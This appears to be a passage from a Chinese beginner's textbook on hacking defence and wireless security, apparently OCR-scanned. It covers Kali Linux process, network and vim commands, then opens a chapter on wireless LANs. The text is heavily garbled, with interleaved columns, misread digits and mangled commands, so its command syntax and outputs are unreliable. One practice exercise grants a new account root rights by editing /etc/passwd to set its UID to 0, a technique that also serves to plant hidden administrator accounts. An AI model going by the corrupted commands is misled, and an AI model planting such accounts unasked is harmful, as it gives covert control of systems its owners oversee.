程 (process〉 的 状态 。 命 令 语法 格式 如 下 : 只 寄 去 了 部 分 信息 。 


ps [options] [==helpl Foot@kali:~# pS aux 
JSER PID %CPU MEM Ysz RS5 TTY STAT START TIME COMMAND 
, RD 
命令 中 选项 的 参数 介绍 见 下 表 。 和 
。 。 196252 8624 ? 5sS 21:37 96:94 /Sbin/intt 
root 2 06.6 6.6 日 ©  ? 5 21:37 6:699 [kthreadd] 
表 PS 命令 参数 介绍 二 二 
root 6 6.6 6.6 日 9  ? I< 21:37 6:69 [kworker/B:QH-k 
root 8 69.6 6.9 6 9 ? I< 21:37 6;69 [mm_percpu_wqj] 
‘ \ .0 g.9 : ksoftirqd 
选 项 含义 人 
站 7 和 3 
Se root 12 ee 869 8 o ?7 5 21:37 :eo Eee | 
i 列 出 所 有 的 行程 之 上 和 
root 15 0.0 6.6 日 5 21:37 _ 6:60 [cpuhp/1] 
-W 显示 加 宽 可 以 显示 较 多 的 资讯 J a 
Kali Linux 系 统 中 时 刻 运 行 着 许多 进 
-auU 显示 较 详 细 的 资讯 Ab 1» 、 
程 ， 如 果 能 够 合理 地 管理 它们 ， 则 可 以 优 
-aUX 显示 包 行 各 已 - T - 
人 化 系统 的 性 能 。 在 Kali Linux 系 统 中 ， 有 5 种 


输出 格式 USER PID %CPU %MEM 常见 的 进程 状态 ， 分 别 为 运行 、 中 断 、 不 


au(x) RSS TTY STAT START TIME 可 中 断 、 僵 死 与 停止， 其 各 自 含义 如 下 。 
- e 及 (运行 ) : 进程 正在 运行 或 在 运 
USER 行程 拥有 者 
行 队列 中 等 待 。 
PID pid 
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S( 中 断 ) : 进程 处 于 休眠 中 ， 当 某 


top - 66: 2:23, User, Da Verage : 
ba Tasks: 199 total 1 running, 198 sleeping, © stoppe 8 zombie 
RCpuls}): 6.3 0 6.3 sy, 0.8 ni, 99.4 id, 6.6 wa， :多 
MiB Mem : 3943.1 total, 2382.2 free 963.3 used, 657.6 buff/cache 
人 sp 口 | 一 V MiB Swap 2045.8 total, 28645.8 free 0.0 Used. 2791.1 avail Mem 
| ~ We | 日 9 
pI SER 'R NI YIR RE SHR < Cf ME INME+ 
nl YY \ 太 949 root 28 8 286364 51612 33566 5 二 , 8:67.31 
则 脱 该 状态 o 1217 root 296 8 36579896 2663898 87912 5 6.3 6.6 1:54.32 gnome-shell 
1937 root 20 8 9 9 6 工 6.3 6.96 6:16.77 kworker/u64:8B-phye 
四 1994 root 26 © 469124 44416 32648 5 6.3 6:63.39 gnome-terminat- 
1 | 1 | 2423 root 20 8 9 日 工 6.3 6.6 6:961.34 kworker/u564:2-phy9 
@ D ( H 中 时 | ) 4 进程 、 啊 八 /A 系 统 1 root 28 8 196252 8624 5536 5 6.6 6 .2 98:64.22 systemd 
2 root 296 8 9 5 6.6 6.96 6:69.693 kthreadd 
步 ~ 让 - 村 人 也 能 将 3 root 8 -29 9 9 @I 6.6 6.6 6:69 gp 
= 信 和 9 由 便 用 Kill [ja < 个 有 4 root 9 -298 9 9 日 工 6.6 6.9 6:99.99 rcu par gp 


其 中 断 。 n 

。 Z ( 僵 死 ): 进程 已 经 终止 ,但 进 4.23 Kill A 
程 描述 依然 存在 ， 直 到 父 进程 调用 Kali Linux 系 统 中 的 kill 命 令 用 于 删除 执 语 妥 小 
wait4() 系 统 函 数 后 将 进程 释放 。 行 中 的 程序 或 工作 。 命 令 语法 格式 如 下 ; 


© TT (停止 》 : 进程 收 到 停止 信号 后 停 kill [选项 ] [进程 PID] 


下 人 有 命令 中 选项 的 参数 介绍 见 下 表 。 
4.9.2 top 表 kill 命令 参数 介绍 


Kali Linux 系 统 中 的 top 命 令 用 于 实时 选 项 含义 


显示 进程 的 动态 ， 其 使 用 权限 为 所 有 使 用 1- 信息 编号 > ede 则 使 用 
五 、 “-1™ i Ep 日 百 
者 。 命 令 语法 格式 如 下 ， 这 项 会 列 出 全 部 的 信号 名 和 
当 处 理 当 前 进程 时 ， 不 限制 命令 名 
Lop =] id delayl logl tcl Is sl -a 和 进程 号 的 对 应 关系 


Ea 
指定 Kill 命令 只 打印 相关 进程 的 进程 
命令 中 选项 的 参数 介绍 见 下 表 。 二 号 ， 而 不 发 送 任何 信号 


表 top 命 令 参数 介绍 0 指定 发 送信 号 
选 项 含义 1 指定 用 户 


改变 显示 的 更 新 速度 ， 或 是 在 交谈 式 指 例如 ， 使 用 -1 选项 列 出 所 有 信息 编号 ， 


令 列 (interactive command) 按 s 
冬 | > 行 , 
没有 任何 延迟 的 显示 速度 ， 如 果 使 用 者 下 图 为 命令 执行 效 条 


root@kali:-~ 相 kill -\ 
-dq 是 有 管理 员 的 权限 ， 则 top 将 会 以 最 高 的 1) SIGHUP 2) SIGINT 3) 5IGQUIT 4) SIGILL 5) SIGTRAP 
6) SIGABRT 7) SIGBUS 8) 5IGFPE 9) SIGKILL 19) SIGU5R1 
优先 序 执行 HL1) SI6SEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM 
16) SIGSTKFLT 17) SIGCHLD 18) SIGCONT 19) SIGSTOP 28) SIGTSTP 
21) SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ 
一 P6) SITGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO 36)】 SIGPWR 
切换 显示 模式 ， 共有 两 种 模式 ， 一 种 是 B1L} SIGSYS 34) SIGRTMIN 35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3 
Ee _ 四 B8) SIGRTMIN+4 39) SIGRTMIN+5 46) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8 
- 只 显示 执行 档 的 名 称 ， 另 一 种 是 显示 完 43) SIGRTMIN+9 44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13 
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12 
整 的 路 径 与 名 称 53) SIGRTMAX-11 54) SIGRTMAX-19 55) SIGRTMAX-9 55) SIGRTMAX-8 57) SIGRTMAX-7 
58) SIGRTMAX-6 59) SIGRTMAX-:S5 66) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2 
B63) SIGRTMAX-1 64) SIGRTMAX 


累积 模式 ， 会 将 己 完成 或 消失 的 子 行程 
(dead child process) 的 CPU time 累 积 起 来 4.9.4 ifconfig 


安全 模式 ， 将 交谈 式 指 令 取消 , 避免 潜在 


-S 


- 的 危机 Kali Linux 系 统 中 的 ifconfig 命 令 用 于 名 访 六 

不 显示 任何 闲置 (idle) 或 无 用 (zombie) ”获取 网 卡 配 置 与 网 络 状态 等 信息 ， 使 用 让 

- 的 行程 config 命 令 来 查看 本 机 当前 的 网 卡 配 置 与 

n 更 新 的 次 数 ， 完 成 后 将 会 退出 top 网 络 状 态 等 信息 时 ， 其 实 主 要 查看 的 就 是 
批 次 档 模 式 ， 配 合 n 选 项 一 起 使 用 , 可 以 网卡 名 称 、inet 参 数 后 面 的 IP 地 址 、ether 

” 用 来 将 top 的 结果 输出 到 档案 内 参数 后 面 的 网 卡 物理 地 址 (又 称 为 MAC 


地 址 ) ， 以 及 RX、TX 的 接收 数据 包 与 发 
? 品 令 四 一 ] 言 恩 ， 


下 图 为 执行 效果 ， 这 里 只 截取 了 部 分 信息 。 ifeonfig 命 令 语法 格式 如 下 ; 


| 


黑客 攻防 与 无 线 妥 全 从 新 手 到 高 手 〈《 超 值 版 ) 


是 


ifconfig 


命令 中 选项 的 参数 介绍 见 下 表 。 


选项 
add< 地 址 > 
del< 地 址 > 


down 


<hw< 网 络 设备 类 型 >< 硬 件 地 址 > 


io addr<IO 地 址 > 
irq<IRQ 地 址 > 
media< 网 络 媒介 类 型 > 
mem start< 内 存 地 址 > 
metric< 数 目 > 
mtu< 字 节 > 
netmask< 子 网 掩 码 > 
tunnel< 地 址 > 

up 

-broadcast< 地 址 > 
-pointopoint< 地 址 > 
-promisc 

[IP 地 址 ] 

[网 络 设 备 ] 


表 ifconfig 命 令 参 数 介 绍 
含义 

设置 网 络 设备 IPV6 的 人 P 地 址 
删除 网 络 设备 IPv6 的 他 地 址 
关闭 指定 的 网 络 设备 
设置 网 络 设备 的 类 型 与 硬件 地 址 
设置 网 络 设备 的 VO 地 址 
设置 网 络 设备 的 IRQ 
设置 网 络 设备 的 媒介 类 型 
设置 网 络 设备 在 主 内 存 所 占用 的 起 始 地 址 


指定 在 计算 数据 包 的 转送 次 数 时 ， 所 要 加 上 的 数目 


设置 网 络 设备 的 MTU 

设置 网 络 设备 的 子 网 掩 码 

建立 IPV4 与 IPV6 之 间 的 隧道 通信 地 址 
启动 指定 的 网 络 设 备 


将 要 送 往 指定 地 址 的 数据 包 当 成 广播 数据 包 来 处 理 
与 指定 地 址 的 网 络 设 备 建立 直接 连 线 ， 此 模式 具有 保密 功能 


关闭 或 启动 指定 网 络 设备 的 promiscuous 模 式 
指定 网 络 设备 的 下地 址 
指定 网 络 设备 的 名 称 


例如 : 使 用 ifconfig 便 看 网 卡 信息 ， 下 图 为 运行 效果 。 


root@Kkali:~# IfTconfIig 
Pth9: fTLags=4163<UP , BROADCAST ,RUNNING ,MULTICAST> mtyu 1509 


ether 00:0c:29:39:f2:9c txqueuelen 1000 [Ethernet) 

RX packets 7258 bytes 5674882 (5.4 MiB) 

RX errors 9 dropped 6 overruns © frame 0 

TX packets 1960 bytes 13544D [132.2 KiB) 

TX errors © dropped 6 overruns 6 carrier 8 collisions 0 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 

inet 127.06.0.1 netmask 255.90.0.0 

inet6 ::1 prefixlen 128 scopeid 9x19<host> 

loop txqueuelen 10690 (Local Loopback) 

RX packets 36 bytes 1992 (1.9 Ki6) 

RX errors 0 dropped 6 overruns 0 frame 0 

TX packets 36 bytes 1992 (1.9 KiB) 

TX errors 9 dropped 6 overruns 9 carrier 8 collisions 9 


NMLan6: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtuU 1590 


ether e8:4e:06:28:ae:;46 txqueuelen 1009 [Ethernet) 

RX packets 2325 bytes 137400 【134.1 KiB) 

RX errors © dropped 6 overruns © frame 0 

TX packets 104 bytes 8340 (8.1 KiB) 

TX errors © dropped 6 overruns 0 carrier 0 collisions 0 


inet 192.168.157.132 netmask 255.255.255.0 broadcast 192.168.157 .255 
inet6 fe80:;:20c:29ff;fe39:f29c prefixlen 64 scopeid 0x20<=link> 


inet 192.168.0.114 netmask 255.255.255.0 broadcast 192.168.0.255 
inet6 fe80::814f:d52c:e332:2ebl prefixlen 64 scopeid 6x20<Link> 


全 提示 : 

e@ eth0 代 表 以 太 网 卡 如 果 有 多 块 网 
卡 ， 会 一 次 为 eth0，eth1，eth2 这 样 
排列 。 

@ lo 代表 本 地 回环 网 卡 ， 每 个 系统 都 
有 一 个 唯一 的 本 地 回环 。 

e@ wlan0 代 表 无 线 网 卡 ， 如 果 有 多 块 
无 线 网 卡 同 以 太 网 卡 一 样 依次 排列 
为 wlan0，wlanl 这 样 。 


4.10 ”Kali Linux 系 统 的 义 本 纺 
辑 人 六 


在 Kali Linux 系 统 中 ， 目 前 使 用 比较 
多 的 是 vim 编 辑 器 ，vim 具 有 程序 编辑 的 能 
力 ， 可 以 主动 地 以 字体 颜色 辨别 语法 的 正 
确 性 ， 方 便 程序 设计 。 


4.10.1 认识 vim 文 本 编辑 器 


vi 编辑 器 是 所 有 Unix 及 Kali Linux 系 统 
下 标准 的 编辑 器 ， 它 相当 于 Windows 系 统 中 
的 记事 ， 它 的 强大 不 逊色 于 任何 最 新 的 文 
本 编辑 器 。 它 是 使 用 Kali Linux 系 统 中 不 能 
缺少 的 工具 。 对 于 Unix 及 Kali Linux 系 统 的 
任何 版 本 ，vi 编 辑 嚣 是 完全 相同 的 ， 因 此 熟 
练 掌握 该 编辑 器 是 非常 有 好 处 的 。 

vim 编 辑 器 可 以 当 作 vi 编辑 器 的 升级 版 
本 ， 它 可 以 用 多 种 颜色 的 方式 来 显示 一 些 
特殊 的 信息 ， 依 据 文件 扩展 名 或 者 是 文件 
内 的 开头 信息 ， 判 断 该 文件 的 内 容 从 而 自 
动 的 执行 该 程序 的 语法 判断 ， 再 以 颜色 来 
显示 程序 代码 与 一 般 信 息 。 并 且 它 加 入 了 
很 多 额外 的 功能 ， 例 如 支持 正则 表达 式 的 
搜索 、 多 文件 编辑 、 块 复制 ， 等 等 。 


4.10.2 ”vim 的 三 种 模式 


vim 有 三 种 模式 ， 分 别 是 命令 模式 、 插 
入 模式 、 编 辑 模式 ， 如 下 图 所 示 。 


悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


进入 退出 
输入 : wq 


命令 以 回 车 


答 入 iao 结束 运行 


vim 三 种 模式 的 功能 介绍 如 下 : 

e 命令 模式 (默认 ) : 刚 进入 vim 的 时 
候 ， 默 认 便 是 命令 模式 ， 可 以 复制 
行 ， 删 除 行 等 。 

e 插入 模式 : 可 以 输入 内 容 。 

人 出 辑 模 式 : 企 最 下 边 出 现 “ ” 


还 可 以 输入 诸多 管理 员 命令 ， 
vim 三 个 模式 之 间 可 以 目 由 切换 ， 其 
中 ， 命 令 模式 可 以 通过 下 面 这 些 快 捷 键 切 


换 到 插入 模式 : 

e i: 在 当前 光标 所 在 字符 的 前 面 ， 转 
为 插入 模式 。 

e I: 在 当前 光标 所 在 行 的 行 让 转换 为 
插入 模式 。 

e a: 在 当前 光标 所 在 字符 的 后 面 ， 转 
为 插入 模式 。 

e A: 在 光标 所 在 行 的 行 尾 ， 转 换 为 
插入 模式 。 


e 0: 在 当前 光标 所 在 行 的 下 方 ， 
一 行 ， 并 转 为 插入 模式 。 
e。 O: 在 当前 光标 所 在 行 的 上 方 ， 新 
建 一 行 ， 并 转 为 插入 模式 。 
在 插入 模式 下 ， 可 以 通过 按 下 Esc 键 
切换 为 命令 模式 ， 在 命令 模式 下 ， 输 入 
“: ”可 切换 为 编辑 模式 。 


4.10.3 ”使 用 vim 打 开 文 件 


使 用 vim 打 开 文 件 的 方法 主要 有 以 下 几 
种 ， 下 面 分 别 进行 介绍 : 

(1) vim /path/to/somefile 。vim 后 跟 文 
件 路 径 及 文件 名 ， 如 果 文 件 存 在 ， 则 打开 
编辑 文件 窗口 ， 如 果 文 件 不 存在 ， 则 创建 
文件 。 


新 建 


73 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


(2) vim +#。 打 开 文 件 ， 并 定位 到 第 # 
行 ，# 代表 数字 。 

例如 : 输入 vim +3 /ect/flas.ini 命 令 ， 如 
下 图 所 示 。 


FF Show (or hotj action ofTseis In disassembty 

9: no offsets 
- 1: relative offsets from the start of action block 
# 2: absolute offsets from the start of SWF 
Ehowoffset = 9 
涛 9: Show offsets above jin decimal form, 1: 


hexoffset = 0 


(3) vim +。 打 开 文 件 ， 定 位 到 最 后 
一 行 


in hexadecimal form 


例如 : 输入 vim + /etc/flasm.ini 命 令 ， 如 
下 图 所 示 。 


Tlatest: IT set to TLlabrowser, caltls the browser aTter Updafte 
laplayer = C:\PROGRA~1\FLASHM~1\PLAYERS\SAFLASHPLAYER .EXE 
Labrowser = C:\PROGRA~1\INTERN~1\IEXPLORE .EXE 

latest = flabrowser 
'fetc/flasm.ini" 45L, 1745C 45,1 后 端 


(4) vim +/PATTERN。 打 开 文 件 ， 定 位 
到 第 一 次 被 PATTERN 匹配 到 的 行 的 行 首 。 

例如 :输入 vim +/fla /etc/flasm.ini 命 
令 ， 如 下 图 所 示 。 


these options controU what happens when FLasm 15 called Trom FLUash IDEI 
Flash 5 and Flash MX only, see "Embedding Flasm code" in flasm.html 
上 岂 flaplayer: path to flash player 
让 flabrowser: path to flash browser 
上 on windows, path should contain no spaces, therefore D05 format 
卜 flatest: if set to flaplayer, calls the player after Update 
上 flatest: if set to flabrowser, calls the browser after update 
flLapLayer = C:\PROGRA~1\FLASHMN~1\PLAYERS\SAFLASHPLAYER .EXE 
flabrowser = C:\PROGRA~1\INTERN~1\IEXPLORE .EXE 
flLatest = flabrowser 


37,1 后 端 


4.11 实战 演练 


实战 演练 1 一 一 创建 普通 账户 提升 管理 权 
限 


给 Kali Linux 操 作 系 统 创建 一 个 账户 ， 
并 修改 该 账号 为 管理 员 权 限 。 


使 用 adduser 命 令 添 加 一 个 test001 的 账 
5 如 下 图 所 示 o 


root@Kkali: /home/test# adduser test001 
Adding user teste691' ... 
Adding new group ‘test001' (1001) 
Adding new user ‘test001' (1990) with group “testg91， 
Creating home directory ‘ /hone/test001' 
Copying files from /etc/skel' 
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully 
Changing the user information for test001 
Enter the new value, or press ENTER for the default 
Full Name []: 
Room Number [|]: 
Work Phone [1]: 
Home Phone []: 
Other []: 
Is the information correct? [Y/n] y 
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使 用 su 命令 切换 到 test001 账 户 ， 执 行 
useradd 命 令 ， 发 现 没有 权限 ， 如 下 图 所 示 。 


test001l@kali:/home/test$ useradd test002 

useradd: Permission denied. 

useradd: cannot lock /etc/passwd; try again later. 
testo01@kali:/home/test$ 卜 


(多 注意 : 管理 员 账 号 使 用 # 作 为 命令 提示 


使 用 vi 打开 /etc/passwd 文 件 ， 可 以 看 
到 root 账 号 的 用 户 ID 为 0 组 ID 也 为 0， 在 文件 
的 末尾 是 新 加 账户 test001, 用 户 ID1000， 如 
下 图 所 示 。 


File Edit View Search Terminal Help 
root:x:9:9:root:/root:/bin/bash 
daemonN:x:1:1:daemon: /usr/sbin: /usr/sbin/noloogin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 

SYyS:X:3:3:SySs:/dev: /usr/sbin/nologin 
sync:xX:4:65534:5ync:/bin:/bin/sync 
games:x:5:60:games: /usr/games: /usr/sbin/nologin 
man:x:6:12:man: /var/cache/man: /usr/sbin/nologin 
beef-xss:x:132:141::/var/lib/beef-xss:/usr/sbin/nologin 
Debian-gdm:x:133:142:Gnome Display Manager:/var/lib/gdm3:/bin/false 
systemd-coredump:x:998:998:systemd Core Dumper:/:/sbin/nologin 
Debian- snmp:x:117:122::/var/lib/snmp:/bin/false 


[stp 图 修改 test001 账 户 ID 为 0， 再 次 切换 账 
户 发 现 test001 已 经 为 管理 员 ， 如 下 图 所 示 。 


vahi:x:128:136:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin 
ulse:x:129:137:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin 
radis:;x:138;139;;/var/lib/dradis;/usr/sbin/nologin 
ing-phisher:x:131:148::/var/lib/king-phisher:/usr/sbin/nologin 
eef-xss:X:132:141::/var/lib/beef-xss:/usr/sbin/nologin 
ebian-gdm:;x:;133:;142:;Gnome Display Manager:;/var/\lib/gdm3:/bin/false 
ystemd-coredump:x:998:998:systemd Core Dumper:/:/sbin/nologin 
ebian-snmp:x:117:122::/var/lib/snmp: /bin/false 
est001:x:0:0:,,,:/home/test981: /bin/bash 


再 次 从 root 账 户 切 换 到 test001 账 户 ， 
此 时 test001 已 经 具有 管理 员 权 限 ， 如 下 图 
所 示 。 


oot@kali: /home/test# su test001 
oot@kali: /home/test# whoami 
root 

oot@kali:/home/test# 国 


实战 演练 2 一 一 通过 命令 获取 到 本 机 IP 
地 址 


通过 命令 获取 到 本 地 IP 地 址 可 以 通过 
以 下 几 个 步骤 : 


使 用 ifconfig 命 令 查看 本 机 网 卡 及 IP 地 
址 ， 如 下 图 所 示 。 


Footekali:-# iTconTig 

Eth8: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1589 
inet 192.168.5.139 netmask 255.255.255.9 broadcast 192.168.5.259 
inet6 fe80::20c:29ff:fe7f:39f2 prefixlen 64 scopeid Bx26<Link> 
ether O08:0c:29:7f:39:fT2 txqueuelen 10609 (Ethernet) 

RX packets 3117 bytes 232891 (227.4 KiB) 

RX errors B dropped 0 overruns 8 frame 0 

TX packets 478 bytes 422g5 (41.2 KiB) 

TX errors 8 dropped 9 overruns 8 carrier 9 collisions 6 


Lo: flags=73<UP,LODPBACK,RUNNING> mtu 655365 

inet 127.0.9.1 netmask 255.0.0.8 

inet6 ;;1] prefixlen 128 scopeid 0x10<host> 

loop txqueuelen 1966 (Local Loopback) 

RX packets 32 bytes 1836 (1.7 KiB) 

RX errors 8 dropped 9 overruns 8 frame 6 

TX packets 32 bytes 1836 (1.7 KiB) 

TX errors B dropped 9 pverruns B carrier 9 collisions 9 
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使 用 ifconfig eth0 命 令 过 滤 掉 本 地 回 
环 地 址 ， 只 显示 出 eth0 外 网 IP 地 址 ， 如 下 图 
所 示 。 


rootE@kali:~# ifconfig eth5 

Eth@: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1506 
inet 192.168.5.130 netmask 255.255.255.0 broadcast 192.168.5.253 
inet6 fe80::28cC:29ff:fe7f:3912 prefixlen 64 scopeid Gx2g<link> 
ether 00:0c:29:7f:39:12 txqueuelen 1006 (Ethernet) 

RX packets 3206 bytes 238549 (232.9 KiB) 

RX errors 0 dropped © overruns 0 frame 9 

TX packets 478 bytes 42835 (41.8 KiB) 

TX errors 8 dropped 6 overruns © carrier 9 collisions @ 


使 用 ifconfig eth0lgrep"inet" 命 令 ， 过 
滤 出 包含 有 inet 字 段 的 内 容 ， 如 下 图 所 示 。 


et ifconfig ethe|grep "inet" 


inet 192.168.5.136 netmask 255.255.255.0 broadcast 192.168.5.255 
inet6 fe86:; :206Cc:;:29ff;fe7f:;39f2 prefixlen 64 scopeid 6x20<Link> 


使 用 ifconfig eth0lgrep "inet" | cut -d 
“:” - 馆 命令， 过 滤 出 inet 字 段 第 一 行 ， 如 
下 图 所 示 。 


root@kali:~# ifconfig eth961grep "inet" | cut -d ":" 
| 168.5.136 netmask 255.255.255.0 


-f2 
broadcast 192. 


使 用 1fconfig ethOlgrep "net" | cut ,| nn 
-人 2 | cut -d "t" - 亿 命 令 过 滤 掉 inet 字 段 ， 如 下 
图 所 示 。 


rootGKaLI:~ 并 ifTConfig eth5[grep "inet™ | cut -d ":™ 
Nn 


-TZ | cut -dg tm -Tz 


使 用 ifconfig eth0lgrep "inet"|cut -d":" 
-f2|cut -d "t" -f 2|cut -d "n" -fl 命令 ， 过 滤 掉 
后 n 字 符 后 面 的 内 容 ， 获 取 到 完整 的 本 机 JP 
地 址 ， 如 下 图 所 示 。 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 SEE 


root@kali:-~# Ifconfig ethelgrep "inet"|cut -d":" -f2[cut -d "t" -ff 2| 
ecules n= 
192.168.5.130 


小 试 身 手 


练习 1: 使 用 cd 命令 与 1s 命 令 切 换 目 录 
并 查看 目录 中 的 内 容 ， 熟 悉 各 个 目录 中 存 
放 哪 些 文件 。 

练习 2: 使 用 文件 查看 命令 检查 日 志 
信息 。 

练习 3: 试 着 使 用 文件 搜索 命令 查找 需 
要 的 文件 位 置 。 

练习 4: 熟练 使 用 账户 管理 命令 ， 学 会 
如 何 添加 及 删除 账户 。 

练习 5: 试 着 使 用 文件 解压 缩 命令 ， 创 
建 压缩 文件 并 解压 ， 对 比 不 同 解压 缩 命令 
的 区 别 。 

练习 6: 使 用 系统 操作 命令 查看 系统 
进程 。 

练习 7: 熟练 使 用 vi/vim 编 辑 器 ， 学 会 
打开 文件 快速 查找 、 修 改 、 保 存 文件 。 


4.12 
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第 5 章 组建 无 线 安 


全 网 络 


在 无 线 局 域 网 WLAN 发 明之 前 ， 人 们 要 想 通 过 网 络 进行 联络 和 通信 ， 必 须 先 用 网 线 组 
建 一 个 有 线 网 络 。 不 过 ， 这 种 有 线 网 络 无 论 组 建 、 拆 装 还 是 在 原 有 基础 上 进行 重新 布局 和 


改建 ， 都 非常 困难 ， 且 成 本 和 代价 也 非常 高 ， 


5.1 认识 无 线 局 域 网 


无 线 局 域 网 是 通过 无 线 通信 技术 进行 
组 网 的 一 个 结合 产物 ， 它 采用 无 线 电 波 、 
红外 线 或 激光 ， 通 过 无 线 通 信 传 输 媒 介 代 
从 传统 网 线 ， 构 成 传统 无 线 局 域 网 的 功 
能 ， 能 够 使 用 户 随时 、 随 地 进行 上 网 。 


无 线 局 域 网 的 优点 
二 与 传统 有 线 网 络 相 比 ， 无 线 网 络 具 有 
让 如 下 优点 : 


名 。 (1) 灵活 性 。 在 有 线 网 络 中 ， 网 络 设 
””“ 备 的 安放 位 置 受 到 网 络 位 置 的 限制 ， 而 无 
线 网 络 则 没有 ， 只 要 在 信号 覆盖 范围 内 ， 
都 可 以 接 入 网 络 。 
(2) 移动 性 。 无 线 网 络 的 最 大 优点 在 
于 它 的 移动 性 ， 接 入 的 用 户 可 以 在 覆盖 范 
围 内 随意 移动 ， 且 还 能 保持 网 络 的 连接 。 
(3) 方便 安装 。 无 线 网 络 可 以 最 大 程 
度 地 减少 网 络 布线 ， 一 般 只 须 安装 一 个 或 
多 个 接 入 点 设备 ， 这 样 便 可 以 建立 起 一 个 
覆盖 面 广 的 网 络 区 域 。 
ov 和 ai 
而 言 ， 办 公 地 点 或 网 络 拓扑 的 改变 通常 
”要 重新 建 网 ， 而 无 线 网 络 则 可 以 避免 或 减 
人 站 这 少 这 些 情况 的 发 生 。 
六 吕 密 。 (5) 故障 定位 容易 。 有 线 网 络 一 旦 出 现 
物理 故障 ， 尤 其 是 由 于 线路 中 断 或 线路 不 
良 造成 的 网 络 故障 ， 往 往 很 难 查 找 原 因 ， 
并 且 线 路 检修 也 需要 付出 很 大 的 代价 ， 无 


于 是 无 线 组 网 方式 应 运 而 生 。 


线 网 络 则 不 同 ， 故 障 容易 定位 ， 定 位 后 更 
换 故 障 设备 即 可 恢复 网 络 。 

(6) 易于 扩展 。 无 线 网 络 有 多 种 配置 
方式 ， 可 以 很 快 从 只 有 几 个 用 户 的 小 型 局 
域 网 扩展 到 上 千 用 户 的 大 型 网 络 ， 并 且 还 
有 节点 间 漫 游 的 特性 ， 这 些 是 有 线 网 络 所 
不 能 实现 的 。 


5.1.2 ”无线 局 域 网 的 缺点 


无 线 网 络 的 缺点 主要 体现 在 性 能 、 速 率 
与 安全 性 三 个 方面 ， 下 面 进 行 详细 介绍 : 

(1) 性 能 。 无 线 网 络 是 依靠 无 线 电波 进 
行 传输 的 ， 因 此 无 线 电波 受到 遮挡 或 者 其 
他 电波 干扰 都 可 能 阻碍 电磁 波 传输 ， 受 到 
这 些 外 因 影 响 会 直接 导致 网 络 性 能 降低 。 

(2) 速率 。 无 线 信 道 的 传输 速率 与 有 
线 信 道 相 比 要 低 得 多 ， 虽 然 无 线 网 络 还 在 
不 断 的 发 展 ， 目 前 已 经 能 达到 最 快 500Mb/s 
的 传输 速率 ， 但 是 与 有 线 网 络 的 千 兆 传输 
速率 相 比 还 是 有 差距 的 。 

(3) 安全 性 。 由 于 无 线 传输 的 特性 导 
致 无 线 传输 是 发 散 的 ， 不 要 求 建立 物理 连 
接 通道 ， 因 此 从 理论 上 讲 ， 很 容易 被 监听 
造成 信息 泄露 。 


5.1.3 无线 局 域 网 的 组 网 模型 


无 线 局 域 网 有 其 方便 灵活 的 特性 ， 当 
然 它 也 有 自己 的 基本 组 网 模型 ， 如 下 图 所 
示 。 该 组 网 模型 的 组 成 元 件 包括 站 点 、 接 
入 反 、 无 线 介 质 、 分 布 式 系 统 等 。 


9 
接 入 点 无 线 介质 


(1) 站 上 点。 配置 网 络 的 目的 ， 是 为 了 
在 站 点 之 间 传 送 数据 。 所 谓 站 点 ， 是 指 配 
备 无 线 网 络 接口 的 计算 设备 ， 即 带 有 无 线 
网 卡 的 通信 设备 ， 如 笔记 本 计算 机 、 手 机 、 
iPad 等 无 线 设备 。 

(2) 接 入 点 。 无 线 网 络 所 使 用 的 帧 必 
须 经 过 转换 ， 才 能 被 传递 至 其 他 不 同类 型 
的 无 线 设 备 。 具 备 无 线 至 有 线 桥接 功能 
的 设备 称 为 接 入 点 〈 人 简称 AP) ， 如 无 线 局 
域 网 中 的 无 线路 由 器 ， 就 是 一 个 简单 的 接 
入 所 。 

(3) 无 线 介 质 。IEEE 802.11 标准 以 无 
线 介 质 (Wireless medium) 在 工作 站 之 间 
传递 数据 帧 。 其 所 定义 的 物理 层 不 止 一 种 ; 
这 种 架构 允许 多 种 物理 层 同时 支持 802.11 
MAC - 802.11 最 初 标 准 化 了 的 两 种 射频 
(radio frequency， 人 简称 RF) 物理 层 以 及 一 
种 红外 线 (infrared ) 物理 层 ， 然 而 事后 证 
明 RF 物理 层 较 受 欢迎 。 

(4) 分 布 式 系统 。 当 几 个 接 入 点 串联 
以 覆盖 较 大 区 域 时 ， 役 此 之 间 必 须 相互 通 
信 ， 才 能 够 掌握 移动 式 工作 站 的 行 踩 。 
而 分 布 式 系统 (distribution system) 属于 
802.11 的 逻辑 元 件 ， 负 责 将 帧 〈frame) 转 
送 至 目的 地 。 


5.1.4 认识 无 线 连 接 方式 


说 起 WiFi 大 家 都 知道 可 以 无 线 上 网 ， 
其 实 ，WiFi 是 一 种 无 线 连 接 方式 ， 并 不 是 
无 线 网 络 或 者 是 其 他 无 线 设 备 。 

WiFi 是 一 个 无 线 网 络 通信 技术 的 品 
牌 ， 由 WiFi 联 盟 (WiFi Alliance) 所 持 有 。 
目的 在 于 改善 基于 IEEE 802.11 标 准 的 无 线 
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网 络 产 品 之 间 的 互通 性 。WiFi 联 盟 成 立 于 
1999 年 ， 当 时 的 名 称 叫 作 Wireless Ethernet 
Compatibility Alliance (WECA)， 在 2002 年 
10 月 ， 正 式 改名 为 WiFi Alliance。 

以 前 通过 网 线 连接 计算 机 ， 自 从 有 了 
WiFi 技 术 ， 则 可 以 通过 无 线 电 波 来 联网 ; 
